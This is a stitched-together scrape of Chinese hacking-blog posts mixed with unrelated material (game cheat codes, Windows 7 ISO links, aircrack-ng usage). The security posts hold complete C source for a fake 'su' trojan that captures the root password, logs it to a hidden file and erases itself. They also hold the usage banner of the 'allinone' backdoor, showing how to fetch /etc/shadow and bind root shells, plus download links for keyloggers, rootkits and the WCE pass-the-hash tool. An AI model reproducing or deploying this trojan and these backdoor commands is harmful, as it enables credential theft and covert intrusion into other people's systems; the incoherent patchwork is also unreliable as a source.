SSHscan.py will allow you to scan a internal network through a SSH with port forwarding enabled. The tool allows to create a port forward in localhost for every open port detected in the internal network range.

This tool is not one that can be used in every engagement but when you have the opportunity and the need it will came handy.

The tool has been included in the edgeSSH kit, where we will include all the scripts related with SSH, at the moment only bruteSSH, a SSH login bruteforcer and scanSSH are included in the kit.

You can download the code here: http//code.google.com/p/edgessh

Command line options:        -h: target host       -u: username       -p: password       -l: targets lists to scan       -t: threads       --remote-host: host to scan       --remote-ports: port list to scan       --default-ports: scan default ports       --all-ports: scan all 65535 ports       --keep-tunnels: Forward all open ports

Examples:

    scanssh.py -h 192.168.1.55 -u root -p passowrd -t list.txt    scanssh.py -h 192.168.1.55 -u root -p password --remote-host 127.0.0.1 --remote-ports 80,443    scanssh.py -h 192.168.1.55 -u root -p password --remote-host 127.0.0.1 --default-ports

[source: http://edge-security.blogspot.com/2011/06/scanning-ports-through-ssh-port.html]

随机日志

• 2009年08月15日 -- 360 模拟点击demo
• 2010年01月18日 -- Nokia 5800相机参数设置拍出清晰的照片
• 2008年10月12日 -- 快客电邮(QuarkMail)远程命令执行漏洞
• 2008年10月17日 -- BackTrack 3 (BT3)中文版，可显示中文文件及文件夹（二）
• 2006年10月26日 -- MSSQL db_owner角色注入直接获得系统权限(续)
• 2008年10月12日 -- Dbshell
• 2009年06月26日 -- 119.21G彩虹表种子【修复可以100%】
• 2008年11月18日 -- 解决Perl 5.8.8用XML::RSS无法解析非utf-8编码的RSS问题
• 2009年05月25日 -- BaoFeng (config.dll) ActiveX Remote Code Execution Exploit
• 2008年11月3日 -- Discuz! flash Csrf bug

Web目录下有一些文件不允许匿名访问（可以使用Tomcat、Apache、nginx等进行配制，来实现此效果），如下图：

可以使用以下代码+字典破解，运行结果如下：

主要代码如下（附件中有完整代码，仅供学习！请勿非法使用！）：

点击下载：Crack_pass.rar

随机日志

• 2009年03月17日 -- 好诗！好诗也~~~~哇哈哈
• 2008年10月17日 -- 用U盘引导启动硬盘上的BT3的方法
• 2010年05月21日 -- 橙色预警：PHP PATH_INFO 存在漏洞
• 2009年07月21日 -- Php168 v6 权限提升漏洞
• 2008年11月24日 -- 清除桌面的BlogCID.dat的办法
• 2008年12月4日 -- 不被处罚的DIV隐藏连接-目前最流行的SEO做友情连接方法
• 2007年05月17日 -- Windows .ANI LoadAniIcon Stack Overflow
• 2007年12月10日 -- 公布我的防SQL注入的代码，可记录攻击者IP地址
• 2007年09月16日 -- 很长时间没来这里了
• 2010年04月23日 -- Shopex V4.8.4 V4.8.5 0Day 通杀

/*

/*

* kpr-fakesu.c V0.9beta167

* by koper

*

* Setting up:

* admin@host:~$ gcc -o .su fakesu.c; rm -rf fakesu.c

* admin@host:~$ mv .su /var/tmp/.su

* admin@host:~$ cp .bash_profile .wgetrc

* admin@host:~$ echo "alias su=/var/tmp/.su">>.bash_profile

* admin@host:~$ logout

* *** LOGIN ***

* admin@host:~$ su

* Password:

* su: Authentication failure

* Sorry.

* admin@host:~$ su

* Password:

* root@host:~# logout

* admin@host:~$ cat /var/tmp/.pwds

* root:dupcia17

* admin@host:~$

*

* /bin/su sends various failure information depending on the OS ver.

* Please modify the source to make it "fit" <img src="http://www.4shell.org/wp-content/uploads/images/2011/11/1323384Sm.gif" alt=";)">

*

*/

#include

#include

#include

main(int argc, char *argv[]){

FILE *fp;

char *user;

char *pass;

char filex[100];

char clean[100];

sprintf(filex,"/var/tmp/.pwds");

sprintf(clean,"rm -rf /var/tmp/.su;mv -f /home/test/.wgetrc /home/test/.bash_profile");

if(argc==1) user="root";

if(argc==2) user=argv[1];

if(argc>2){

if(strcmp(argv[1], "-l")==0)

user=argv[2];

else user=argv[1];}

fprintf(stdout,"assword: ");

pass=getpass ("");

system("sleep 3");

fprintf(stdout,"su: Authentication failurenSorry.n");

if ((fp=fopen(filex,"w")) != NULL)

{

fprintf(fp, "%s:%sn", user, pass);

fclose(fp);

}

system(clean);

system("rm -rf /var/tmp/.su; ln -s /bin/su /var/tmp/.su");

}

以下三个都是比较经典的backdoor：

http://www.4shell.org/tools/klogger-1.4.gz

http://www.4shell.org/tools/enyelkm.en.v1.1.tar.gz

http://www.4shell.org/tools/sshbd.tgz

这个是在linux穿墙的，通过53号端口建立隧道：

http://www.4shell.org/tools/dns2tcp-0.5.tar.gz

相关文章

• 2011年11月25日 -- 最小化安装CentOS6 VMware-tools安装几点注意事项
• 2011年11月24日 -- allinone: Linux pentest tools
• 2011年06月10日 -- VMware 硬盘扩容
• 2011年06月6日 -- Linux下MySQL的load_file常用路径
• 2011年06月6日 -- linux渗透小技巧
• 2011年05月26日 -- Linux 安装基于PPTPD的vpn,内网渗透用
• 2011年05月16日 -- kernel-2.6.18-164 Local 2010 Exploit Root Private Cant See Images
• 2011年04月30日 -- Linux基本操作命令
• 2011年04月30日 -- 让putty支持中文输入和显示
• 2011年04月28日 -- 一次Linux下的普通渗透测试

A great app level backdoor in Linux . Very useful while doing Linux pentest.

Written by Lion [HUC(Hack Union of China)] at year 2002

The source code has some errors in packetstromsecurity’s archive; Now all fixed by akshell(http://www.linuxpentest.com)

/************************************************************************
* allinone.c for HUC (2002.1)
*
* allinone.c is
* a Http server,
* a sockets transmit server,
* a shell backdoor,
* a icmp backdoor,
* a bind shell backdoor,
* a like http shell,
* it can translate file from remote host,
* it can give you a socks5 proxy,
* it can use for to attack, jumps the extension, Visits other machines.
* it can give you a root shell.:)
*

* Usage:
* compile:
* gcc -o allinone allinone.c -lpthread
* run on target:
* ./allinone
*
* 1.httpd server
* Client:
* http://target:8008/givemefile/etc/passwd
* lynx -dump http://target:8008/givemefile/etc/shadow > shadow
* or wget http://target:8008/givemefile/etc/shadow
*
* 2.icmp backdoor
* Client:
* ping -l 101 target (on windows)
* ping -s 101 -c 4 target (on linux)
* nc target 8080
* kissme:) –> your password
*
* 3.shell backdoor
* Client:
* nc target 8008
* kissme:) –> your password
*
* 4.bind a root shell on your port
* Client:
* http://target:8008/bindport:9999
* nc target 9999
* kissme:) –> your password
*
* 5.sockets transmit
* Client:
* http://target:8008/socks/:local listen port::you want to tran ip:::you want to tran port
* http://target:8008/socks/:1080::192.168.0.1:::21
* nc target 1080
*
* 6.http shell
* Client:
* http://target:8008/givemeshell:ls -al (no pipe)
*
* ps:
* All bind shell have a passwd, default is: kissme:)
* All bind shell will close, if Two minutes do not have the connection.
* All bind shell only can use one time until reactivates.
*
*
* Code by lion, e-mail: lion@cnhonker.net
* Welcome to HUC Website, Http://www.cnhonker.com
*
* Test on redhat 6.1/6.2/7.0/7.1/7.2 (maybe others)
* Thx bkbll’s Transmit code, and thx Neil,con,iceblood for test.
*
************************************************************************/
Download:
http://www.4shell.org/tools/allinone.tgz

相关文章

• 2012年01月2日 -- How to attack a windows domain
• 2011年11月25日 -- 最小化安装CentOS6 VMware-tools安装几点注意事项
• 2011年11月24日 -- linux Backdoor
• 2011年06月10日 -- VMware 硬盘扩容
• 2011年06月6日 -- Linux下MySQL的load_file常用路径
• 2011年06月6日 -- linux渗透小技巧
• 2011年05月26日 -- Linux 安装基于PPTPD的vpn,内网渗透用
• 2011年05月16日 -- kernel-2.6.18-164 Local 2010 Exploit Root Private Cant See Images
• 2011年04月30日 -- Linux基本操作命令
• 2011年04月30日 -- 让putty支持中文输入和显示

set WarfareGame.Pawn_COGMarcus DefaultHealth 99999
set warfaregame.Weap_locustpistol MaxSpareAmmo 9999
set warfaregame.Weap_locustpistol Magsize 5000
set warfaregame.Weap_cogpistol MaxSpareAmmo 9999
set warfaregame.Weap_cogpistol Magsize 5000
set warfaregame.Weap_locustassaultrifle MaxSpareAmmo 9999
set warfaregame.Weap_locustassaultrifle MagSize 5000
set WarfareGame.Weap_AssaultRifle MaxSpareAmmo 9999
set WarfareGame.Weap_AssaultRifle MagSize 1000
set WarfareGame.Weap_Grenade MaxSpareAmmo 9999
set WarfareGame.Weap_Grenade MagSize 9000
set WarfareGame.Weap_SniperRifle MaxSpareAmmo 9999
set WarfareGame.Weap_SniperRifle MagSize 5000
set WarfareGameContentWeapons.Weap_Bow MaxSpareAmmo 9999
set WarfareGameContentWeapons.Weap_Bow MagSize 5000
set WarfareGameContentWeapons.Weap_Boomer MaxSpareAmmo 9999
set WarfareGameContentWeapons.Weap_Boomer MagSize 9000
set WarfareGame.Weap_Shotgun MaxSpareAmmo 9999
set WarfareGame.Weap_Shotgun MagSize 9000

保存，进游戏，打开控制台后输入exec 文件名.txt，用上面的例子就是exec cheat.txt，即可方便地打开所需的作弊码了。改血量的话刚改完主角会变成血红状态，可能是改得太猛的原因，没关系，让人打几枪后就没事了。99999的血量应该足够了，我改完在蝙蝠那关站着不动让蝙蝠秒，再加上几个兽人围攻不还手，硬是撑了差不多10分钟

 
----------------------------------------------------------------------------
对应命令的注释：

手雷弹药量  set WarfareGame.Weap_Grenade magsize <number>
机枪弹药量  set WarfareGame.Weap_AssaultRifle magsize <number>
手炮弹药量  set warfaregame.weap_locustpistol magsize <number>
兽人机枪弹药量   set warfaregame.weap_locustassaultrifle magsize <number>
霰弹弹药量  set warfaregame.weap_shotgun magsize <number>
阻击弹药量  set WarfareGame.Weap_SniperRifle magsize <number>
手枪弹药量  set warfaregame.weap_cogpistol magsize <number>
弓箭弹药量  set WarfareGameContentWeapons.Weap_Bow magsize <number>
火箭炮弹药量 set WarfareGameContentWeapons.Weap_Boomer magsize <number>

Baird血量   set WarfareGameContent.Pawn_COGBaird DefaultHealth <number>
Carmine血量   set WarfareGameContent.Pawn_COGCarmine DefaultHealth <number>
Cole血量   set WarfareGameContent.Pawn_COGGus DefaultHealth <number>
Dom血量   set WarfareGame.Pawn_COGDom DefaultHealth <number>
Marcus血量   set WarfareGame.Pawn_COGMarcus DefaultHealth <number>
Minh血量  set WarfareGameContent.Pawn_COGMinh DefaultHealth <number>

----------------------------------------------------------------------------

Assault Rifle(攻击步枪)
Grenade(手榴弹)
Sniper Rifle(狙击手步枪)
Bow(弓)
locust pistol(蝗虫手枪)
cogpistol(左轮手枪)
locust assault rifle(蝗虫攻击步枪)
shot gun(射击枪)
Boomer(火箭炮)
Magic Bullets Timeout Duration(Increase Time for Perfect Active Reload Damage Bonus )

----------------------------------------------------------------------------
关于武器的更多信息查找WarWeapon.ini文件
X:\Program Files\Microsoft Games\Gears of War\WarGame\Config\WarWeapon.ini

WarWeapon.ini内容不能修改，但可以提供给我们控制台命令参数。
例如

[WarfareGame.Weap_AssaultRifle]
InitialMagazines=6
CriticalAmmoCount=10
LastBulletStrongerPercent=0.75f
PRM_Damage=(Value=(20,21,22,23,24))
PRM_DamageAI=(Value=(20,21,22,23,24))
MagSize=60
MaxSpareAmmo=600
...

其中MagSize=60（弹夹大小）可以通过控制台改输入如下（将弹夹大小改成1000）

set WarfareGame.Weap_AssaultRifle MagSize 1000
----------------------------------------------------------------------------
过多的修改也会造成游戏的不稳定，最好挑选自己喜欢的装备修改。以下仅供参考：

//--------------------------血量---------------------------------
set WarfareGame.Pawn_COGMarcus DefaultHealth 99999
set WarfareGame.Pawn_COGDom DefaultHealth 99999
set WarfareGameContent.Pawn_COGCarmine DefaultHealth 99999
set WarfareGameContent.Pawn_COGBaird DefaultHealth 99999
set WarfareGameContent.Pawn_COGMinh DefaultHealth 99999
set WarfareGameContent.Pawn_COGGus DefaultHealth 99999
//--------------------------常规枪----------------------------
set WarfareGame.Weap_AssaultRifle MaxSpareAmmo 99999 //单个弹夹子弹上限
set WarfareGame.Weap_AssaultRifle MagSize 1000 //补给时一个弹夹子弹数量
//--------------------------手榴弹----------------------------
set WarfareGame.Weap_Grenade MaxSpareAmmo 99999
set WarfareGame.Weap_Grenade MagSize 90000
//--------------------------狙击步枪--------------------------
set WarfareGame.Weap_SniperRifle MaxSpareAmmo 99999
set WarfareGame.Weap_SniperRifle MagSize 50000
//--------------------------弓--------------------------------
set WarfareGameContentWeapons.Weap_Bow MaxSpareAmmo 99999
set WarfareGameContentWeapons.Weap_Bow MagSize 50000
//--------------------------手炮-------------------------------
set WarfareGameContentWeapons.Weap_Boomer MaxSpareAmmo 99999
set WarfareGameContentWeapons.Weap_Boomer MagSize 900000
//--------------------------散弹枪-----------------------------
set WarfareGame.Weap_Shotgun MaxSpareAmmo 99999
set WarfareGame.Weap_Shotgun MagSize 90000

随机日志

• 2008年10月19日 -- Nuke ET < = 3.4 (fckeditor) Remote Arbitrary File Upload Exploit
• 2008年11月18日 -- 极品飞车12台湾官网上线 Maggie Q访谈视频
• 2009年08月24日 -- 关于MySQL权限
• 2009年08月16日 -- 一个命令可以攻击所有Linux系统
• 2009年07月23日 -- 《火线保镖》推荐电影
• 2009年08月27日 -- Discuz! Plugin Crazy Star <= 2.0 Sql injection Vulnerability
• 2009年07月10日 -- 关于gh0st的一些东西！
• 2008年12月1日 -- Cain & Abel 4.9.23 (rdp file) Buffer Overflow PoC
• 2009年08月20日 -- “fatal error LNK1104: cannot open file “mfc42u.lib””问题解决
• 2009年08月28日 -- dedecms 5.3 – 5.5注入漏洞

5分钟的确能下完Window7，但有个前提条件，已经存在有一个相同语言且非企业版、非vl版的Windows7。如果还没有下载过任何版本的Windows7，以下方法并不适用，建议你先下载Ultimate版，速度最快。

例如：

拥有Ultimate_x86、starter_x86、professional_x86、home_premium_x86、homebasic_x86中任意一个版本的windows 7就可以得到剩余4个版本中的任意一个版本windows 7。

拥有Ultimate_x64、professional_x64、home_premium_x64中任意一个版本的windows 7就可以得到剩余2个版本中的任意一个版本windows 7。

（理论上还存在有一个homebasic_x64，但不知是什么原因，微软并未发布。）

以下是使用Xtreme获取的方法：

第一步：将所需版本的windows7添加到下载列表。

‍

第二步：在所添加的下载文件上右键，“查看文件详情”，仔细观察其中有一项 “Hashset可用:(是/否)”，当显示为是的时候继续下一步（如果显示为否，并且文件大于2G，再继续下一步的话，将有可能出现内存溢出的错误）

‍

‍

第三步：在所添加的下载文件上右键，选择“导入文件块”，并选择相对应的X86或X64版本文win7。（如果没有这个功能，请打开Xtreme选项－扩展设置－显示更多控制(高级模式控制)，打勾，确定。另外，下载x86时不可导入x64的文件，反之。纯浪费时间且无效果）

‍

‍

第四步：安静等待导入完成（可以在 服务器－日志 中观察导入的情况）

‍

‍

导入完成后，理论上的完成度就应该就可以达到99%以上，再等待2，3分钟就可以下载完成。如果长时间无反应，可以先停止再继续

这个是最安全，最稳定的快速下载方法，无需借助任何不明身份的第三方软件或者补丁就可以完成。

‍

相关文章

• 2011年04月4日 -- Windows 7 with SP1中英文原版MSDN下载汇总
• 2009年05月17日 -- Windows 7 RC 7100 GDI驱动Win32k.sys内核D.O.S漏洞

5分钟就能下完Window7?
答: 是的，但有个前提条件，就是本地已经存在一个相同语言且非企业版、非vol版的Windows7。具体方法见http://msdn.itellyou.cn/help.htm#express-download （该方法由景友romanyu推荐，特此感谢）

下载有问题？
1.版本不符
2.99.9%停止下载，方法1-先按一下暂停然后重新开始；方法2-关闭下载软件，将文件拷到其他地址，去掉后缀；方法3-一直等待，总会下完的。方法4-Google或百度。

文件SHA1校验工具 IHasher （来自http://msdn.itellyou.cn）
http://msdn.itellyou.cn/download.aspx?lastversion=ihasher

(32位+64位)单独的SP1安装包（来自http://msdn.itellyou.cn 和微软官网,多语言版本）
Windows 7 and Window Server 2008 R2 Service Pack 1 (x86 and x64) - DVD (Multilanguage)
mu_windows_7_and_windows_server_2008_r2_sp1_x86_x64_dvd_619642.iso (1.91 GB)
http://www.microsoft.com/downloads/zh-cn/details.aspx?FamilyID=c3202ce6-4056-4059-8a1b-3a9b77cdfdda###
SHA1: F2ABA1102E18EAD08C78527AB422C09AB7D1F54C

(32位或64位)单独的SP1安装包（来自微软官网，多语言版本）

32位SP1独立安装包
Windows 7 and Window Server 2008 R2 Service Pack 1 (x86）
http://download.microsoft.com/download/0/A/F/0AFB5316-3062-494A-AB78-7FB0D4461357/windows6.1-KB976932-X86.exe
SHA1: C3516BC5C9E69FEE6D9AC4F981F5B95977A8A2FA

64位SP1独立安装包
Windows 7 and Window Server 2008 R2 Service Pack 1 (x64）
http://download.microsoft.com/download/0/A/F/0AFB5316-3062-494A-AB78-7FB0D4461357/windows6.1-KB976932-X64.exe
SHA1: 74865EF2562006E51D7F9333B4A8D45B7A749DAB

(32位或64位)语言包（电驴链接来自http://msdn.itellyou.cn;BT种子来源海盗湾,验证为原版）

32位语言包（多语言）
Windows 7 Service Pack 1 Language Pack (x86) - DVD (Multilanguage)
mu_windows_7_sp1_language_pack_x86_dvd_619716.iso (2.1 GB)
mu_windows_7_sp1_language_pack_x86_dvd_619716.iso.6180150.TPB.torrent (11.23 KB, 下载次数: 605)
SHA1: E9261433FF5CCACA818328A9BDBBED3F21A6405E

64位语言包（多语言）
Windows 7 Service Pack 1 Language Pack (x64) - DVD (Multilanguage)
mu_windows_7_sp1_language_pack_x64_dvd_619714.iso (2.56 GB)
mu_windows_7_sp1_language_pack_x64_dvd_619714.iso.6180161.TPB.torrent (13.49 KB, 下载次数: 325)
SHA1: 7CD1FE568D968D89792DC9FF20E9AF2B318995C2

英文版Windows 7集成SP1原版光盘镜像（主要来自于http://msdn.itellyou.cn,英文专业版（批量授权）链接来源于LinZiqing本人)

英文家庭基础版32位
Windows 7 Home Basic with Service Pack 1 (x86) - DVD (English)
en_windows_7_home_basic_with_sp1_x86_dvd_620759.iso (2.39 GB)
SHA1: 047AF9ECEA6F9430B2C0CA64CE8A6F888FCD5A64

英文家庭高级版32位
Windows 7 Home Premium with Service Pack 1 (x86) - DVD (English)
en_windows_7_home_premium_with_sp1_x86_dvd_620895.iso (2.39 GB)
SHA1: 22DF3E5A80F8DBF014C2776A01B1CD9F24D83233

英文家庭高级版64位
Windows 7 Home Premium with Service Pack 1 (x64) - DVD (English)
en_windows_7_home_premium_with_sp1_x64_dvd_620851.iso (3.09 GB)
SHA1: B4821F46A171708F5F8F8A0EF48FC16529437961

英文专业版32位
Windows 7 Professional with Service Pack 1 (x86) - DVD (English)
en_windows_7_professional_with_sp1_x86_dvd_631025.iso (2.39 GB)
SHA1: 917A542B0541054BB9C2A06A11A46AED6943856B

英文专业版64位
Windows 7 Professional with Service Pack 1 (x64) - DVD (English)
en_windows_7_professional_with_sp1_x64_dvd_621750.iso (3.09 GB)
SHA1: 5ED2584110E03F498DB4458BA9FAFD5A7EF602ED

英文专业版（批量授权）32位
Windows 7 Professional with Service Pack 1, VL Build (x86) - DVD (English)
en_windows_7_professional_with_sp1_vl_build_x86_dvd_623530.ISO (2.27 GB)
SHA1: 85E9767CD50C6083160393F85CB2C4156CD9348D

英文专业版（批量授权）64位
Windows 7 Professional with Service Pack 1, VL Build (x64) - DVD (English)
en_windows_7_professional_with_sp1_vl_build_x64_dvd_622458.ISO (2.96 GB)
SHA1: 647C756B95EEF95C05EA04EEAFED035E0065EB9E

英文企业版32位
Windows 7 Enterprise with Service Pack 1 (x86) - DVD (English)
en_windows_7_enterprise_with_sp1_x86_dvd_620186.iso (2.27 GB)
SHA1: 4788041EB06E0F49720C112FBD256AC637909D4F

英文企业版64位
Windows 7 Enterprise with Service Pack 1 (x64) - DVD (English)
en_windows_7_enterprise_with_sp1_x64_dvd_620201.iso (2.96 GB)
SHA1: 2C9774A1F48570E749E6D33C642FE8F6F7898CB0

英文旗舰版32位
Windows 7 Ultimate with Service Pack 1 (x86) - DVD (English)
en_windows_7_ultimate_with_sp1_x86_dvd_619077.iso (2.39 GB)
SHA1: 92C1ADA4FF09C76EC2F1974940624CAB7F822F62

英文旗舰版64位
Windows 7 Ultimate with Service Pack 1 (x64) - DVD (English)
en_windows_7_ultimate_with_sp1_x64_dvd_618240.iso (3.09 GB)
SHA1: 1693B6CB50B90D96FC3C04E4329604FEBA88CD51

简体中文版Windows 7集成SP1原版光盘镜像（主要来自于http://msdn.itellyou.cn, 32位企业版和旗舰版电驴链接为景友clemond先于MSDN I Tell You发布，但下载链接是一样的。32位旗舰版BT种子由景友sooyun制作，确认为原版；64位旗舰版BT种子来自于景友sooyun和parick,均验证为原版，其中sooyun为首发。中文专业版32位和64位BT种子由景友jattyshen发布，确认为原版。）

中文初级版32位
Windows 7 Starter with Service Pack 1 (x86) - DVD (Chinese-Simplified)
cn_windows_7_starter_with_sp1_x86_dvd_624050.iso (2.47 GB)
SHA1: 6F5556ABBEFD828C22AEBBF9FBC15E2E3773F999

中文家庭基础版32位
Windows 7 Home Basic with Service Pack 1 (x86) - DVD (Chinese-Simplified)cn_windows_7_home_basic_with_sp1_x86_dvd_620743.iso (2.47 GB)
SHA1: A5E7B9238FE12DFD7DC6159E2AA92A690C366B12

中文家庭高级版32位
Windows 7 Home Premium with Service Pack 1 (x86) - DVD (Chinese-Simplified)
cn_windows_7_home_premium_with_sp1_x86_dvd_620856.iso (2.47 GB)
SHA1: 56903FDA27100BF8AC196D2C829315884EF47E43

中文家庭高级版64位
Windows 7 Home Premium with Service Pack 1 (x64) - DVD (Chinese-Simplified)
cn_windows_7_home_premium_with_sp1_x64_dvd_620792.iso (3.18 GB)
SHA1: 5A09954C370D3A163A0AAE0013420F90FAE422EE

中文专业版32位
Windows 7 Professional with Service Pack 1 (x86) - DVD (Chinese-Simplified)
cn_windows_7_professional_with_sp1_x86_dvd_622569.iso (2.47 GB)
cn_windows_7_professional_with_sp1_x86_dvd_622569.iso.torrent (99.31 KB, 下载次数: 1285)
SHA1: AC125D0D1B3BCECE24BB7711F09DE89D1D5F4494

中文专业版64位
Windows 7 Professional with Service Pack 1 (x64) - DVD (Chinese-Simplified)
cn_windows_7_professional_with_sp1_x64_dvd_621744.iso (3.18 GB)
cn_windows_7_professional_with_sp1_x64_dvd_621744.iso.torrent (16.3 KB, 下载次数: 600)
SHA1: BD12A9DF4EF2960B1919AD0048B81380B679194E

中文专业版（批量授权）32位
Windows 7 Professional with Service Pack 1, VL Build (x86) - DVD (Chinese-Simplified)
cn_windows_7_professional_with_sp1_vl_build_x86_dvd_623494.iso (2.33 GB)
SHA1: 2D5127FB53B21DC35F4455E87FF1BE52D48B6D57

中文专业版（批量授权）64位
Windows 7 Professional with Service Pack 1, VL Build (x64) - DVD (Chinese-Simplified)
cn_windows_7_professional_with_sp1_vl_build_x64_dvd_622431.iso (3.04 GB)
SHA1: C2BEAC6955851BB4BBC0DEAE32C2C85763369E0D

中文企业版32位
Windows 7 Enterprise with Service Pack 1 (x86) - DVD (Chinese-Simplified)
cn_windows_7_enterprise_with_sp1_x86_dvd_620153.iso (2.33 GB)
SHA1: FF7A3A72DC56E51DEF1FB6F2D6CCE38A5CBE298E

中文企业版64位
Windows 7 Enterprise with Service Pack 1 (x64) - DVD (Chinese-Simplified)
cn_windows_7_enterprise_with_sp1_x64_dvd_620654.iso (3.04 GB)
SHA1: 37AA1CA36E6F6FC317E7B278A391A942594DCB5A

中文旗舰版32位
Windows 7 Ultimate with Service Pack 1 (x86) - DVD (Chinese-Simplified)
cn_windows_7_ultimate_with_sp1_x86_dvd_618763.iso (2.47 GB)
cn_windows_7_ultimate_with_sp1_x86_dvd_618763.iso.torrent (14.2 KB, 下载次数: 5715)
SHA1: A94623A6B572541157B63FFD9C0495ED47BE792A

中文旗舰版64位
Windows 7 Ultimate with Service Pack 1 (x64) - DVD (Chinese-Simplified)
cn_windows_7_ultimate_with_sp1_x64_dvd_618537.iso (3.18 GB)
cn_windows_7_ultimate_with_sp1_x64_dvd_618537(sooyun).iso.torrent (17.81 KB, 下载次数: 661)
cn_windows_7_ultimate_with_sp1_x64_dvd_618537.iso.torrent (128.1 KB, 下载次数: 2891)
SHA1: 1FF1C323F49F76179837ACCB5D33FA0B1DFAA201

更新日志
1.北京时间2月17日凌晨1点，发布 Windows 7 SP1独立安装包.
2.北京时间2月17日凌晨，添加英文企业版SP1集成版和旗舰版SP1集成版.
3.北京时间2月17日，新增语言包，种子来源于海盗湾，为jody99于2月17日发布.
4.北京时间2月18日凌晨1点，新增英文专业版（批量授权）, 为ip221于2月17日发布于飞速网，希望下载完的朋友能够制作个BT种子或电驴链接，方便大家下载.
5.北京时间2月18日15点，更新语言包下载链接，新增家庭基础版，家庭高级版，专业版下载。专业批量版暂移至12楼，待更新。
6.北京时间2月19日凌晨3点，重新添加语言包BT种子（种子来源于海盗湾，为jody99于2月17日发布），32位和64位文件均验证为微软原版，并且已经储存在迅雷云端（见12楼附图1），迅雷会员可直接离线下载，非会员稍后便有较快速度。英文专业版（批量授权）（ip221飞速网版）经验证为微软原版， 本人已制作电驴链接，目前正在由迅雷离线下载提取至云端，上传完成后会及时发布，请持续关注（见12楼附图2）
7.北京时间2月19日22点，简化帖子编排，原贴放于21楼。英文专业版（批量授权）迅雷离线上传进度为：32位，68%；64位，44%，请继续关注。
8.北京时间2月20日17点，添加英文专业版（批量授权）32位电驴链接，该文件已经100%上传至迅雷云端，迅雷会员可以用离线下载获取，测试下载速度约为300kb/s, 非迅雷会员可等速度起来后下载。64位上传进度为74%，请持续关注。
9.北京时间2月20日19点, 添加英文专业版（批量授权）64位电驴链接，该文件已经100%上传至迅雷云端，迅雷会员可以用离线下载获取，测试下载速度最高可达1MB/s, 非迅雷会员可等速度起来后下载。
10.北京时间2月22日凌晨5点，添加中文版相关信息，期待下载链接中。。。
11.北京时间2月22日7点,添加中文版32位企业版和旗舰版，这两个文件为景友clemond发布。
12.北京时间2月22日17点,添加中文版64位旗舰版,32位企业版和旗舰版经核实MSDN 发布的链接和Clemond发布的相同，因Clemond在先，故仍然标注来自Clemond。另外，因为部分网友反馈下载的英文专业版SHA1与旗舰版相同，本人已经和MSDN I Tell You管理员取得联系，经查，这两个下载链接确实为PRO版本的链接。管理员建议使用Xtreme8.0下载。
13.北京时间2月22日18点,添加来自于MSDN I Tell You管理员关于英文专业版的校验文件, 以及文件SHA1校验工具 IHasher.
14.北京时间2月22日20点,添加中文32位旗舰版BT种子，该种子由景友sooyun制作
15.北京时间2月23日0点，添加SP1补丁包微软官网下载链接。
16.北京时间2月23日16点，添加中文专业版32位电驴链接，来源于MSDN I Tell You；同时添加中文旗舰版64位BT种子，来源于景友parick。添加32位和64位分开的SP1安装包，该链接本来由某远景工作人员添加，特此感谢，但似乎链接不可用（可能是我移动时不小心造成的），本人重新编辑。
17.北京时间2月23日17点，添加中文专业版32位和64位BT种子，该种子由景友jattyshen发布.
18.北京时间2月24日凌晨1点，添加32位和64位中文家庭基础版和家庭高级版电驴链接，来源于MSDN I Tell You。
19.北京时间2月24日凌晨3点，补上64位中文专业版电驴链接，来源于MSDN I Tell You，多谢景友heihac2600提醒。
20.北京时间2月24日17点，添加64位中文企业版和32位，64位中文专业版（批量授权）电驴链接，来源于MSDN I Tell You，感谢景友zhangmu的热心提醒。另外，经网友建议，添加系统中文名。撤掉12楼英文专业版（批量授权）飞速网下载链接。
21.北京时间2月25日20点,添加中文64位旗舰版BT种子，来源于景友sooyun，本人亲自下载验证此版本为原版，与parick发布的种子相比，sooyun的种子发布时间更早，经确认，为首发。
22.北京时间3月1日,取消阅读限制，并条理版面。
23.北京时间3月3日凌晨1点，添加中文初级版，来自于MSDN I Tell You.

相关文章

• 2011年04月4日 -- 5分钟下完Window7
• 2009年05月17日 -- Windows 7 RC 7100 GDI驱动Win32k.sys内核D.O.S漏洞

Windows Credentials Editor v1.0
Supports Windows XP, 2003, Vista, 7 and 2008 (Vista was not actually
tested yet, but it should work).
Windows Credentials Editor (WCE) allows to list logon sessions and add,
change, list and delete associated credentials (ex.: LM/NT hashes). This
can be used, for example, to perform pass-the-hash on Windows and also
obtain NT/LM hashes from memory (from interactive logons, services,
remote desktop connections, etc.) which can be used in further attacks.
You can find it here:
http://www.ampliasecurity.com/research/wce_v1.0.tgz

随机日志

• 2009年02月28日 -- 利用注册表读hash
• 2009年12月14日 -- Linux下渗透嗅探术
• 2009年08月27日 -- BT4 pre Final下spoonwep2和spoonwpa整合方法
• 2007年11月19日 -- autorun.inf完全操作手册
• 2009年11月14日 -- 专家：Adobe Flash安全策略的风险高
• 2009年09月24日 -- 深圳大学2009届校长章必功毕业致辞
• 2008年10月11日 -- backtrack 3(BT3) usb版 破解WEP无线网络密码详细步骤
• 2007年11月18日 -- 0.01秒关闭网页
• 2008年11月4日 -- Discuz! admin\runwizard.inc.php get-webshell bug
• 2007年08月7日 -- 一步就可以防止网络剪刀网络执法官等的方法

/************************************************************
1.AirCrack-ng
Aircrack is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once enough data packets have been captured. It implements the standard FMS attack along with some optimizations like KoreK attacks, thus making the attack much faster compared to other WEP cracking tools. In fact, aircrack is a set of tools for auditing wireless networks.
Aircrack是一个802.11协议WEP和WPA-PSK密钥P解程序,能够恢复出密钥当抓取了足够的数据包的时候.它执行标准FMS攻击并提供一些优化(算法)像Korek攻击,因此相比其他WEPP解工具能够更加快的进行攻击.事实上,Aircrack是一系列的工具用以审计无线网络.
Aircrack-ng 1.0 r1645 - (C) 2006, 2007, 2008, 2009 Thomas d'Otreppe
Original work: Christophe Devine

http://www.aircrack-ng.org

usage: aircrack-ng [options] <.cap / .ivs file(s)>
使用方法: aircrack-ng [选项] <.cap 或 .ivs文件>

Common options: //命令选项
-a : force attack mode (1/WEP, 2/WPA-PSK) //设置攻击模式(1是WEP,2是WPA-PSK)
-e : target selection: network identifier //目标选择:网络标识(如TP-LINK)
-b : target selection: access point's MAC //目标选择:AP的MAC地址
-p : # of CPU to use (default: all CPUs) //使用的CPU(缺省值:全部CPU)
-q : enable quiet mode (no status output) //开启安静模式(不输出状态)
-C : merge the given APs to a virtual one //归并给的AP到一个虚拟的
-l : write key to file //把密钥key写入文件

Static WEP cracking options: //静态WEPP解选项
-c : search alpha-numeric characters only //只搜索字母和数字的字符
-t : search binary coded decimal chr only //只搜索二-十进制的字符
-h : search the numeric key for Fritz!BOX //搜索数字密钥(给Fritz!BOX)
